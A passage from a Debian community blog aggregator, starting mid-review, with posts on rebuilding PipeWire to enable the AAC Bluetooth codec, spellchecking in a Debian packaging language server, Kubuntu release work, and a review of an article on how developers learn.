the book, when you've seen the patterns and are hearing about the fourth
variation. But this is still an astonishing book, and a worthy entry in
the genre of capitalism disasters.
</p>
<p>Rating: 7 out of 10</p>2024-02-25T03:46:00+00:00Russ AllberyJacob Adams: AAC and Debian
https://tookmund.com/2024/02/aac-and-debian
<p>Currently, in a default installation of Debian with the GNOME desktop,
Bluetooth headphones that require the AAC codec<sup id="fnref:apple"><a class="footnote" href="https://tookmund.com/feed.xml#fn:apple" rel="footnote">1</a></sup> cannot be used.
<a href="https://wiki.debian.org/BluetoothUser/a2dp#AAC_codec">As the Debian wiki outlines</a>,
using the AAC codec over Bluetooth, while technically supported by
PipeWire, is explicitly disabled in Debian at this time.
This is because the <code class="language-plaintext highlighter-rouge">fdk-aac</code> library needed to enable this support is currently
in the <code class="language-plaintext highlighter-rouge">non-free</code> component of the repository, meaning that PipeWire, which
is in the <code class="language-plaintext highlighter-rouge">main</code> component, cannot depend on it.</p>
<h1 id="how-to-fix-it-yourself">How to Fix it Yourself</h1>
<p>If what you, like me, need is simply for Bluetooth Audio to work with AAC
in Debian’s default desktop environment<sup id="fnref:default"><a class="footnote" href="https://tookmund.com/feed.xml#fn:default" rel="footnote">2</a></sup>,
then you’ll need to rebuild the <code class="language-plaintext highlighter-rouge">pipewire</code> package to include the
AAC codec. While the current version in Debian <code class="language-plaintext highlighter-rouge">main</code> has been built with AAC
deliberately disabled, it is trivial to enable if you can install a version
of the <code class="language-plaintext highlighter-rouge">fdk-aac</code> library.</p>
<p><strong>I preface this with the usual caveats when it comes to patent
and licensing controversies. I am not a lawyer; building this package and/or
using it could get you into legal trouble.</strong></p>
<p>These instructions have only been tested on an up-to-date copy of Debian 12.</p>
<ol>
<li>Install <code class="language-plaintext highlighter-rouge">pipewire</code>’s build dependencies
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>sudo apt install build-essential devscripts
sudo apt build-dep pipewire
</code></pre></div> </div>
</li>
<li>Install <code class="language-plaintext highlighter-rouge">libfdk-aac-dev</code>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>sudo apt install libfdk-aac-dev
</code></pre></div> </div>
<p>If the above doesn’t work you’ll likely need to enable non-free and try again</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>sudo sed -i 's/main/main non-free/g' /etc/apt/sources.list
sudo apt update
</code></pre></div> </div>
<p>Alternatively, if you wish to ensure you are maximally license-compliant and
patent un-infringing<sup id="fnref:ianal"><a class="footnote" href="https://tookmund.com/feed.xml#fn:ianal" rel="footnote">3</a></sup>,
you can instead build <code class="language-plaintext highlighter-rouge">fdk-aac-free</code> which includes only those components
of AAC that are known to be patent-free<sup id="fnref:ianal:1"><a class="footnote" href="https://tookmund.com/feed.xml#fn:ianal" rel="footnote">3</a></sup>.
This is what should eventually end up in Debian to resolve this problem
(see below).</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>sudo apt install git-buildpackage
mkdir fdk-aac-source
cd fdk-aac-source
git clone https://salsa.debian.org/multimedia-team/fdk-aac
cd fdk-aac
gbp buildpackage
sudo dpkg -i ../libfdk-aac2_*deb ../libfdk-aac-dev_*deb
</code></pre></div> </div>
</li>
<li>Get the <code class="language-plaintext highlighter-rouge">pipewire</code> source code
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>mkdir pipewire-source
cd pipewire-source
apt source pipewire
</code></pre></div> </div>
<p>This will create a bunch of files within the <code class="language-plaintext highlighter-rouge">pipewire-source</code> directory,
but you’ll only need the <code class="language-plaintext highlighter-rouge">pipewire-&lt;version&gt;</code> folder; this contains all the
files you’ll need to build the package, with all the Debian-specific patches
already applied.
Note that you don’t want to run the <code class="language-plaintext highlighter-rouge">apt source</code> command as root, as it will
then create files that your regular user cannot edit.</p>
</li>
<li>Fix the dependencies and build options.
To make the build scripts use the fdk-aac library,
save the following as <code class="language-plaintext highlighter-rouge">pipewire-source/aac.patch</code>:
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>--- debian/control.orig
+++ debian/control
@@ -40,8 +40,8 @@
modemmanager-dev,
pkg-config,
python3-docutils,
- systemd [linux-any]
-Build-Conflicts: libfdk-aac-dev
+ systemd [linux-any],
+ libfdk-aac-dev
Standards-Version: 4.6.2
Vcs-Browser: https://salsa.debian.org/utopia-team/pipewire
Vcs-Git: https://salsa.debian.org/utopia-team/pipewire.git
--- debian/rules.orig
+++ debian/rules
@@ -37,7 +37,7 @@
-Dauto_features=enabled \
-Davahi=enabled \
-Dbluez5-backend-native-mm=enabled \
- -Dbluez5-codec-aac=disabled \
+ -Dbluez5-codec-aac=enabled \
-Dbluez5-codec-aptx=enabled \
-Dbluez5-codec-lc3=enabled \
-Dbluez5-codec-lc3plus=disabled \
</code></pre></div> </div>
<p>Then you’ll need to run <code class="language-plaintext highlighter-rouge">patch</code> from within the <code class="language-plaintext highlighter-rouge">pipewire-&lt;version&gt;</code> folder
created by <code class="language-plaintext highlighter-rouge">apt source</code>:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>patch -p0 < ../aac.patch
</code></pre></div> </div>
</li>
<li>Build <code class="language-plaintext highlighter-rouge">pipewire</code>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>cd pipewire-*
debuild
</code></pre></div> </div>
<p>Note that you will likely see an error from <code class="language-plaintext highlighter-rouge">debsign</code> at the end of this process.
This is harmless: you simply don’t have a GPG key set up to sign your
newly-built package<sup id="fnref:gpg-key"><a class="footnote" href="https://tookmund.com/feed.xml#fn:gpg-key" rel="footnote">4</a></sup>. Packages don’t need to be signed to be installed,
and debsign uses a somewhat non-standard signing process that dpkg does not
check anyway.</p>
</li>
</ol>
<ol start="6">
<li>Install <code class="language-plaintext highlighter-rouge">libspa-0.2-bluetooth</code>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>sudo dpkg -i libspa-0.2-bluetooth_*.deb
</code></pre></div> </div>
</li>
<li>Restart PipeWire and/or Reboot
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>sudo reboot
</code></pre></div> </div>
<p>Theoretically there’s a set of user services you could restart here to
get PipeWire to pick up the new library, probably just pipewire itself.
But it’s just as easy to reboot and ensure everything is using the correct
library.</p>
</li>
</ol>
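<p>If you would rather avoid a full reboot, the following is a sketch of the restart step, under the assumption that you are on a default Debian 12 desktop where PipeWire runs as systemd user services (service names may differ on other setups):</p>

```shell
# Restart the PipeWire user services so the rebuilt libspa plugin is loaded.
# Assumes a systemd user session (the Debian 12 GNOME default).
systemctl --user restart pipewire pipewire-pulse wireplumber
```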
<h1 id="why">Why</h1>
<p>This is a slightly unusual situation, as the <code class="language-plaintext highlighter-rouge">fdk-aac</code> library is licensed
under what
<a href="https://www.gnu.org/licenses/license-list.html#fdk">even the GNU project</a>
acknowledges is a free software license.
However, <a href="https://android.googlesource.com/platform/external/aac/+/master/NOTICE">this license</a>
explicitly informs the user that they need to acquire
a patent license to use this software<sup id="fnref:correction"><a class="footnote" href="https://tookmund.com/feed.xml#fn:correction" rel="footnote">5</a></sup>:</p>
<blockquote>
<p>3. NO PATENT LICENSE</p>
<p>NO EXPRESS OR IMPLIED LICENSES TO ANY PATENT CLAIMS, including without
limitation the patents of Fraunhofer, ARE GRANTED BY THIS SOFTWARE LICENSE.
Fraunhofer provides no warranty of patent non-infringement with respect to this
software.
You may use this FDK AAC Codec software or modifications thereto only for
purposes that are authorized by appropriate patent licenses.</p>
</blockquote>
<p>To quote the GNU project:</p>
<blockquote>
<p>Because of this, and because the license author is a known patent aggressor,
we encourage you to be careful about using or redistributing software under
this license: you should first consider whether the licensor might aim to
lure you into patent infringement.</p>
</blockquote>
<p>AAC is covered by a number of patents, which expire at some point in the 2030s<sup id="fnref:patentexpire"><a class="footnote" href="https://tookmund.com/feed.xml#fn:patentexpire" rel="footnote">6</a></sup>.
As such, the current version of the library is potentially legally dubious to ship with
any other software, as it could be considered patent-infringing<sup id="fnref:ianal:2"><a class="footnote" href="https://tookmund.com/feed.xml#fn:ianal" rel="footnote">3</a></sup>.</p>
<h2 id="fedoras-solution">Fedora’s solution</h2>
<p>Since 2017, Fedora has included a modified version of the library
as fdk-aac-free, see the <a href="https://lists.fedoraproject.org/archives/list/devel@lists.fedoraproject.org/thread/F64JBJI2IZFT2A5QDXGHNMPALCQIVJAX/">announcement</a> and the <a href="https://bugzilla.redhat.com/show_bug.cgi?id=1501522">bugzilla bug requesting review</a>.</p>
<p>This version of the library includes only the AAC LC profile, which is believed
to be entirely patent-free<sup id="fnref:ianal:3"><a class="footnote" href="https://tookmund.com/feed.xml#fn:ianal" rel="footnote">3</a></sup>.</p>
<p>Based on this, there is an open bug report in Debian requesting that the
<a href="https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=981285"><code class="language-plaintext highlighter-rouge">fdk-aac</code> package be moved to the main component</a>
and that the
<a href="https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1021370"><code class="language-plaintext highlighter-rouge">pipewire</code> package be updated to build against it</a>.</p>
<h2 id="the-debian-new-queue">The Debian NEW queue</h2>
<p>To resolve these bugs, a version of <code class="language-plaintext highlighter-rouge">fdk-aac-free</code> has been uploaded to Debian
by Jeremy Bicha.
However, to make it into Debian proper, it must first pass through the
<a href="https://ftp-master.debian.org/new.html">ftpmaster’s NEW queue</a>.
The <a href="https://ftp-master.debian.org/new/fdk-aac-free_2.0.2-3.html">current version of fdk-aac-free</a>
has been in the NEW queue since July 2023.</p>
<p>Based on conversations in some of the bugs above, it’s been there since at least 2022<sup id="fnref:jbicha"><a class="footnote" href="https://tookmund.com/feed.xml#fn:jbicha" rel="footnote">7</a></sup>.</p>
<p>I hope this helps anyone stuck with AAC to get their hardware working for them
while we wait for the package to eventually make it through the NEW queue.</p>
<p><a href="https://news.ycombinator.com/item?id=39503266">Discuss on Hacker News</a></p>
<div class="footnotes">
<ol>
<li id="fn:apple">
<p>Such as, for example, any Apple AirPods, which only support AAC AFAICT. <a class="reversefootnote" href="https://tookmund.com/feed.xml#fnref:apple">↩</a></p>
</li>
<li id="fn:default">
<p>Which, as of Debian 12 is GNOME 3 under Wayland with PipeWire. <a class="reversefootnote" href="https://tookmund.com/feed.xml#fnref:default">↩</a></p>
</li>
<li id="fn:ianal">
<p>I’m not a lawyer, I don’t know what kinds of infringement might or might not be possible here, do your own research, etc. <a class="reversefootnote" href="https://tookmund.com/feed.xml#fnref:ianal">↩</a> <a class="reversefootnote" href="https://tookmund.com/feed.xml#fnref:ianal:1">↩<sup>2</sup></a> <a class="reversefootnote" href="https://tookmund.com/feed.xml#fnref:ianal:2">↩<sup>3</sup></a> <a class="reversefootnote" href="https://tookmund.com/feed.xml#fnref:ianal:3">↩<sup>4</sup></a></p>
</li>
<li id="fn:gpg-key">
<p>And if you DO have a key setup with <code class="language-plaintext highlighter-rouge">debsign</code> you almost certainly don’t need these instructions. <a class="reversefootnote" href="https://tookmund.com/feed.xml#fnref:gpg-key">↩</a></p>
</li>
<li id="fn:correction">
<p>This was originally phrased as “explicitly does not grant any patent rights.” It was <a href="https://news.ycombinator.com/item?id=39503761">pointed out on Hacker News</a> that this is not exactly what it says, as it also includes a specific note that you’ll need to acquire your own patent license. I’ve now quoted the relevant section of the license for clarity. <a class="reversefootnote" href="https://tookmund.com/feed.xml#fnref:correction">↩</a></p>
</li>
<li id="fn:patentexpire">
<p>Wikipedia claims the “base” patents expire in 2031, with the extensions expiring in 2038, but its <a href="https://hydrogenaud.io/index.php/topic,121109.0.html">source for these claims</a> is some guy’s spreadsheet in a forum. The same discussion also brings up Wikipedia’s claim and casts some doubt on it, so I’m not entirely sure what’s correct here, but I didn’t feel like doing a patent deep-dive today. If someone can provide a clear answer that would be much appreciated. <a class="reversefootnote" href="https://tookmund.com/feed.xml#fnref:patentexpire">↩</a></p>
</li>
<li id="fn:jbicha">
<p>According to Jeremy Bícha: <a href="https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1021370#17">https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1021370#17</a> <a class="reversefootnote" href="https://tookmund.com/feed.xml#fnref:jbicha">↩</a></p>
</li>
</ol>
</div>2024-02-25T00:00:00+00:00Jacob AdamsNiels Thykier: Language Server for Debian: Spellchecking
https://people.debian.org/~nthykier/blog/2024/language-server-for-debian-spellchecking.html
<p>This is my third update on writing a language server for Debian packaging files, which
aims at providing a better developer experience for Debian packagers.</p>
<p>Let's go over what I have done since the last report.</p>
<div class="section" id="semantic-token-support">
<h2>Semantic token support</h2>
<p>I have added support for what the Language Server Protocol (LSP) calls semantic tokens. These
are used to provide the editor insights into tokens of interest for users. Allegedly,
this is what editors would use for syntax highlighting as well.</p>
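<p>To illustrate what semantic tokens look like on the wire, here is a minimal sketch of the encoding the LSP specification defines (with hypothetical token data — this is not the actual <tt class="docutils literal">debputy</tt> code): each token becomes five integers, with positions delta-encoded against the previous token.</p>

```python
# Encode semantic tokens into the flat integer array defined by the LSP
# spec: each token contributes [deltaLine, deltaStartChar, length,
# tokenType, tokenModifiers], positions relative to the previous token.

def encode_semantic_tokens(tokens):
    """tokens: position-sorted (line, start_char, length, token_type) tuples.
    Returns the flat "data" list a server sends to the editor."""
    data = []
    prev_line, prev_start = 0, 0
    for line, start, length, token_type in tokens:
        delta_line = line - prev_line
        # The start offset is only relative while staying on the same line.
        delta_start = start - prev_start if delta_line == 0 else start
        data.extend([delta_line, delta_start, length, token_type, 0])
        prev_line, prev_start = line, start
    return data

# Two tokens of type index 0: line 0 col 0 len 6, and line 2 col 4 len 3.
print(encode_semantic_tokens([(0, 0, 6, 0), (2, 4, 3, 0)]))
# → [0, 0, 6, 0, 0, 2, 4, 3, 0, 0]
```

<p>The editor then maps each <tt class="docutils literal">tokenType</tt> index back through the legend the server advertised at initialization, which is what ultimately drives the highlighting.</p>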
<p>Unfortunately, <tt class="docutils literal">eglot</tt> (emacs) does not support semantic tokens, so I was not able to test
this. There is a 3-year-old PR for supporting it, with the last update (~3 months ago) basically
saying "Please sign the Copyright Assignment". I pinged the GitHub issue in the hope it will
get unstuck.</p>
<p>For good measure, I also checked if I could try it via <tt class="docutils literal">neovim</tt>. Before installing, I read
the <tt class="docutils literal">neovim</tt> docs, which helpfully listed the supported features. Sadly, I did not spot
semantic tokens among them and parked the idea there.</p>
<p>That was a bit of a bummer, but I left the feature in for now. If you have an LSP capable
editor that supports semantic tokens, let me know how it works for you! :)</p>
</div>
<div class="section" id="spellchecking">
<h2>Spellchecking</h2>
<p>Finally, I implemented something Otto was missing! :)</p>
<p>This started with Paul Wise reminding me that there are Python bindings for the <tt class="docutils literal">hunspell</tt>
spellchecker. This enabled me to get started with a quick prototype that spellchecked the
<tt class="docutils literal">Description</tt> fields in <tt class="docutils literal">debian/control</tt>. I also added spellchecking of comments while
I was at it.</p>
<p>The spellchecker runs with the standard <tt class="docutils literal">en_US</tt> dictionary from <tt class="docutils literal"><span class="pre">hunspell-en-us</span></tt>, which
does not have a lot of technical terms in it, much less any of the Debian-specific slang.
I spent considerable time providing a "built-in" wordlist for technical and Debian-specific
slang to overcome this. I also made a "wordlist" for known Debian people that the
spellchecker did not recognise. Said wordlist is fairly short as a proof of concept, and
I fully expect it to be community maintained if the language server becomes a success.</p>
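<p>The wordlist-augmentation idea can be sketched like this (a toy stand-in, not the actual <tt class="docutils literal">debputy</tt> code; a plain set replaces the real <tt class="docutils literal">hunspell</tt> dictionary so the example is self-contained):</p>

```python
import re

# Stand-in for the hunspell en_US dictionary (hypothetical tiny sample).
BASE_DICTIONARY = {"the", "flags", "words", "spellchecker"}
# The "built-in" wordlist for Debian-specific slang the dictionary lacks.
DEBIAN_WORDLIST = {"debputy", "debhelper", "dpkg"}

def spellcheck(text):
    """Return (word, offset) pairs for words unknown to both wordlists."""
    known = BASE_DICTIONARY | DEBIAN_WORDLIST
    return [
        (m.group(), m.start())
        for m in re.finditer(r"[A-Za-z-]+", text)
        if m.group().lower() not in known
    ]

print(spellcheck("the debputy spellchecker flags mispeled words"))
# → [('mispeled', 31)]
```

<p>Without the extra wordlist, <tt class="docutils literal">debputy</tt> would be flagged too; merging the "slang" set into the known words is what keeps the diagnostics focused on genuine typos.</p>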
<p>My second problem was performance; I had suspected that spellchecking was not the
fastest thing in the world. Therefore, I added a very small language server for
<tt class="docutils literal">debian/changelog</tt>, which only supports spellchecking the textual part. Even for a
small changelog of 1000 lines, the spellchecking takes about 5 seconds, which
confirmed my suspicion. With every change you make, the existing diagnostics hang around
for 5 seconds before being updated. Notably, in <tt class="docutils literal">emacs</tt>, it seems that diagnostics
get translated into absolute character offsets, so all diagnostics after the change
get misplaced for every character you type.</p>
<p>Now, there is little I could do to speed up <tt class="docutils literal">hunspell</tt>. But I can, as always, cheat.
The way diagnostics work in the LSP is that the server listens to a set of notifications
like "document opened" or "document changed". In a response to that, the LSP can start
its diagnostics scanning of the document and eventually publish all the diagnostics to
the editor. The spec is quite clear that the server owns the diagnostics and the
diagnostics are sent as a "notification" (that is, fire-and-forget). Accordingly, there
is nothing that prevents the server from publishing diagnostics multiple times for a
single trigger. The only requirement is that the server publishes the accumulated
diagnostics in every publish (that is, no delta updating).</p>
<p>Leveraging this, I had the language server for <tt class="docutils literal">debian/changelog</tt> scan the document and
publish once for approximately every 25 typos (diagnostics) spotted. This means you quickly
get your first result and that clears the obsolete diagnostics. Thereafter, you get
frequent updates to the remainder of the document if you do not perform any further changes.
That is, up to a predefined max of typos, so we do not overload the client for longer
changelogs. If you do any changes, it resets and starts over.</p>
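<p>The batching trick itself fits in a few lines (an assumed shape, not the actual implementation): re-publish the full accumulated list every ~25 findings, since each publish wholesale replaces the previous one.</p>

```python
BATCH_SIZE = 25  # publish roughly every 25 typos spotted

def publish_in_batches(lines, find_typos, publish, max_typos=1000):
    """Scan lines and call publish() with the FULL accumulated diagnostics
    list every BATCH_SIZE findings (the LSP has no delta updates), capping
    the run at max_typos so long changelogs do not overload the client."""
    diagnostics = []
    for lineno, line in enumerate(lines):
        for typo in find_typos(line):
            diagnostics.append((lineno, typo))
            if len(diagnostics) >= max_typos:
                publish(list(diagnostics))  # hit the cap; stop scanning
                return
            if len(diagnostics) % BATCH_SIZE == 0:
                publish(list(diagnostics))  # early, partial result
    publish(list(diagnostics))  # final publish with everything found
```

<p>A document with 60 typos would thus publish three times — after 25, after 50, and a final time with all 60 — so the first result (which clears the obsolete diagnostics) arrives quickly.</p>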
<p>The only bit missing was dealing with concurrency. By default, a <tt class="docutils literal">pygls</tt> language server
is single-threaded, which is not great if the language server hangs for 5 seconds every time
you type anything. Fortunately, <tt class="docutils literal">pygls</tt> has built-in support for <tt class="docutils literal">asyncio</tt> and threaded
handlers. For now, I wrote an <tt class="docutils literal">async</tt> handler that <tt class="docutils literal">await</tt>s after each line and set up some
manual detection to stop an obsolete diagnostics run. This means the server will fairly
quickly abandon an obsolete run.</p>
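<p>The obsolete-run detection can be sketched roughly like this (an assumed approach, not the actual <tt class="docutils literal">debputy</tt> code): every edit bumps a version counter, and the scan yields to the event loop after each line and bails out if a newer version has appeared in the meantime.</p>

```python
import asyncio

class Document:
    """Minimal stand-in for the server's per-document state."""
    def __init__(self, lines):
        self.lines = lines
        self.version = 0  # bumped on every "document changed" notification

async def scan(doc, check_line, publish):
    """Spellcheck doc line by line; abandon the run if the document
    changed underneath us, so a fresh scan can take over."""
    started_at = doc.version
    diagnostics = []
    for line in doc.lines:
        await asyncio.sleep(0)  # yield so change notifications can run
        if doc.version != started_at:
            return False  # obsolete run: abandon quickly
        diagnostics.extend(check_line(line))
    publish(diagnostics)
    return True

published = []
doc = Document(["first line", "second line"])
asyncio.run(scan(doc, lambda line: [], published.append))
```

<p>Because the handler yields after every line, a "document changed" notification only ever waits one line's worth of spellchecking before the stale scan steps aside.</p>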
<p>Also, as a side-effect of working on the spellchecking, I fixed multiple typos in the
changelog of <tt class="docutils literal">debputy</tt>. :)</p>
</div>
<div class="section" id="follow-up-on-the-what-next-from-my-previous-update">
<h2>Follow up on the "What next?" from my previous update</h2>
<p>In my previous update, I mentioned I had to finish up my <tt class="docutils literal"><span class="pre">python-debian</span></tt> changes to
support getting the location of a token in a <tt class="docutils literal">deb822</tt> file. That was done, the MR
is now filed, and is pending review. Hopefully, it will be merged and uploaded soon. :)</p>
<p>I also submitted my proposal for a different way of handling relationship substvars to
debian-devel. So far, it seems to have received only positive feedback. I hope it stays
that way and we will have this feature soon. Guillem proposed to move some of this into
<tt class="docutils literal">dpkg</tt>, which might delay my plans a bit. However, it might be for the better in the
long run, so I will wait a bit to see what happens on that front. :)</p>
<p>As noted above, I managed to add <tt class="docutils literal">debian/changelog</tt> as a support format for the
language server. Even if it only does spellchecking and trimming of trailing newlines
on save, it technically is a new format and therefore crosses that item off my list. :D
<p>Unfortunately, I did not manage to write a linter variant that does not involve using
an LSP-capable editor. So that is still pending. Instead, I submitted an MR against
<tt class="docutils literal"><span class="pre">elpa-dpkg-dev-el</span></tt> to have it recognize all the fields that the <tt class="docutils literal">debian/control</tt>
LSP knows about at this time to offset the lack of semantic token support in
<tt class="docutils literal">eglot</tt>.</p>
</div>
<div class="section" id="from-here">
<h2>From here...</h2>
<p>My sprinting on this topic will soon come to an end, so I have to be a bit more careful
now about which tasks I open!</p>
<p>I think I will narrow my focus to providing a batch linting interface. Ideally, with
an auto-fix for some of the more mechanical issues, where there is little doubt about
the answer.</p>
<p>Additionally, I think the spellchecking will need a bit more maturing. My current
code still trips on naming patterns that are "clearly" verbatim or code references
like things written in <tt class="docutils literal">CamelCase</tt> or <tt class="docutils literal">SCREAMING_SNAKE_CASE</tt>. That gets annoying
really quickly. It also trips on a lot of commands like <tt class="docutils literal"><span class="pre">dpkg-gencontrol</span></tt>, but that
is harder to fix since it could have been a real word. I think those will have to be
fixed by people using quotes around the commands. Maybe the most popular ones will end
up in the wordlist.</p>
<p>Beyond that, I will play it by ear if I have any time left. :)</p>
</div>2024-02-24T08:45:38+00:00Niels ThykierScarlett Gately Moore: Kubuntu: Week 3 wrap up, Contest! KDE snaps, Debian uploads.
https://www.scarlettgatelymoore.dev/kubuntu-week-3-wrap-up-contest-kde-snaps-debian-uploads/
<figure class="wp-block-image size-large"><img alt="Witch Wells AZ Sunset" class="not-transparent wp-image-424" height="338" src="https://www.scarlettgatelymoore.dev/wp-content/uploads/20240101_071321-1024x338.png" width="1024" />Witch Wells AZ Sunset</figure>
<p>It has been a very busy 3 weeks here in Kubuntu!</p>
<p>Kubuntu 22.04.4 LTS has been released and can be downloaded from here: <a href="https://kubuntu.org/getkubuntu/">https://kubuntu.org/getkubuntu/</a> </p>
<p>Work done for the upcoming 24.04 LTS release:</p>
<ul>
<li>Frameworks 5.115 is in proposed waiting for the Qt transition to complete.</li>
<li>Debian merges for Plasma 5.27.10 are done, and I have confirmed there will be another bugfix release on March 6th.</li>
<li>Applications 23.08.5 is being worked on right now.</li>
<li>Added support for riscv64 hardware.</li>
<li>Bug triaging and several fixes!</li>
<li>I am working on Kubuntu branded Plasma-Welcome, Orca support and much more!</li>
<li>Aaron and the <a href="http://kfocus.org">Kfocus</a> team have been doing some amazing work getting Calamares perfected for release! Thank you!</li>
<li>Rick has been working hard on revamping kubuntu.org, stay tuned! Thank you!</li>
<li>I have added several more apparmor profiles for packages affected by <a href="https://bugs.launchpad.net/ubuntu/+source/kgeotag/+bug/2046844">https://bugs.launchpad.net/ubuntu/+source/kgeotag/+bug/2046844</a></li>
<li>I have aligned our meta package to adhere to <a href="https://community.kde.org/Distributions/Packaging_Recommendations">https://community.kde.org/Distributions/Packaging_Recommendations</a> and will continue to apply the rest of the fixes suggested there. Thanks for the tip Nate!</li>
</ul>
<p>We have a branding contest! Please do enter, there are some exciting prizes <a href="https://kubuntu.org/news/kubuntu-graphic-design-contest/">https://kubuntu.org/news/kubuntu-graphic-design-contest/</a></p>
<p><strong>Debian:</strong></p>
<p>I have uploaded to NEW the following packages:</p>
<ul>
<li>kde-inotify-survey</li>
<li>plank-player</li>
<li>aura-browser</li>
</ul>
<p>I am currently working on:</p>
<ul>
<li>alligator</li>
<li>xwaylandvideobridge</li>
</ul>
<p><strong>KDE Snaps:</strong></p>
<p>KDE applications 23.08.5 have been uploaded to the Candidate channel; testing help is welcome. <a href="https://snapcraft.io/search?q=KDE">https://snapcraft.io/search?q=KDE</a> I have also been working on bug fixes, time allowing.</p>
<p>My continued employment depends on you, please consider a donation! <a href="https://kubuntu.org/donate/">https://kubuntu.org/donate/</a></p>
<p>Thank you for stopping by!</p>
<p>~Scarlett</p>2024-02-23T11:42:51+00:00sgmooreGunnar Wolf: 10 things software developers should learn about learning
https://gwolf.org/2024/02/10-things-software-developers-should-learn-about-learning.html
<blockquote>
This post is a review for <a href="https://www.computingreviews.com/">Computing Reviews</a>
for <em><a href="https://cacm.acm.org/magazines/2024/1/278891-10-things-software-developers-should-learn-about-learning/fulltext">10 things software developers should learn about learning</a></em>
, an article
published in <em><a href="https://www.computingreviews.com/review/review_review.cfm?review_id=147713">Communications of the ACM</a></em>
</blockquote>
<p>As software developers, we understand the detailed workings of the different components of our computer systems. And–probably due to how computers were presented since their appearance as “digital brains” in the 1940s–we sometimes believe we can transpose that knowledge to how our biological brains work, be it as learners or as problem solvers. This article aims at making the reader understand several mechanisms related to how learning and problem solving actually work in our brains. It focuses on helping expert developers convey knowledge to new learners, as well as learners who need to get up to speed and “start coding.” The article’s narrative revolves around software developers, but much of what it presents can be applied to different problem domains.</p>
<p>The article takes this mission through ten points, with roughly the same space given to each of them, starting with wrong assumptions many people have about the similarities between computers and our brains. The first section, “Human Memory Is Not Made of Bits,” explains the brain processes of remembering as a way of strengthening the force of a memory (“reconsolidation”) and the role of activation in related network pathways. The second section, “Human Memory Is Composed of One Limited and One Unlimited System,” goes on to explain the organization of memories in the brain between long-term memory (functionally limitless, permanent storage) and working memory (storing little amounts of information used for solving a problem at hand). However, the focus soon shifts to how experience in knowledge leads to different ways of using the same concepts, the importance of going from abstract to concrete knowledge applications and back, and the role of skills repetition over time.</p>
<p>Toward the end of the article, the focus shifts from the mechanical act of learning to expertise. Section 6, “The Internet Has Not Made Learning Obsolete,” emphasizes that problem solving is not just putting together the pieces of a puzzle; searching online for solutions to a problem does not activate the neural pathways that would get fired up otherwise. The final sections tackle the differences that expertise brings to play when teaching or training a newcomer: the same tools that help the beginner’s productivity as “training wheels” will often hamper the expert user’s as their knowledge has become automated.</p>
<p>The article is written with a very informal and easy-to-read tone and vocabulary, and brings forward several issues that might seem like commonsense but do ring bells when it comes to my own experiences both as a software developer and as a teacher. The article closes by suggesting several books that further expand on the issues it brings forward. While I could not identify a single focus or thesis with which to characterize this article, the several points it makes will likely help readers better understand (and bring forward to consciousness) mental processes often taken for granted, and consider often-overlooked aspects when transmitting knowledge to newcomers.</p>2024-02-23T01:56:19+00:00Gunnar Wolf